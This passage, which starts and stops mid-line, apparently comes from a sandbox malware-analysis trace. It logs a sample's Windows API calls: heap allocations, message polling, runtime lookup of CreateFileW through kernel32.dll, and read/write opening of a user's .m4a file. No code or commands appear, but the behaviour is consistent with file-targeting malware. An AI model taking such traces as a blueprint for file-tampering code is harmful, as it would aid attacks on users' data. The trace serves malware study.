RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0185.780] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0185.780] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0185.780] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0185.780] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0185.780] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0185.780] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.781] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.781] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.781] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.781] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0185.781] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0185.781] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0185.781] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0185.781] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0185.781] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0185.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0185.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0185.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0185.782] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0185.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0185.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd948 [0185.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd948, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0185.782] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\iytlsfhuhj3z6gymj.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0185.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0185.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0185.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0185.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0185.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0185.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0185.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0185.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0185.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0185.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0185.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0185.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0185.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0185.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0185.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe0) returned 0x8fff00 [0185.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd95c8 | out: hHeap=0x8a0000) returned 1 [0185.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0185.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0185.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0185.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0185.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0185.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0185.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0185.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0185.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0185.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0185.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0185.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0185.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0185.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0185.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0185.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0185.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0185.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0185.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0185.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0185.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0185.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0185.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0185.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0185.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0185.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0185.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0185.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0185.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0185.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0185.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0185.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0185.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0185.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0185.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0185.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0185.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0185.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0185.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0185.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0185.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0185.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0185.784] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0185.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0185.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0185.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0185.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0185.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0185.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0185.786] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0185.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0185.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0185.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0185.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0185.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0185.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0185.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0185.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0185.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0185.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0185.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0185.786] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0185.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0185.786] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0185.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0185.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0185.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0185.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0185.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0185.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | 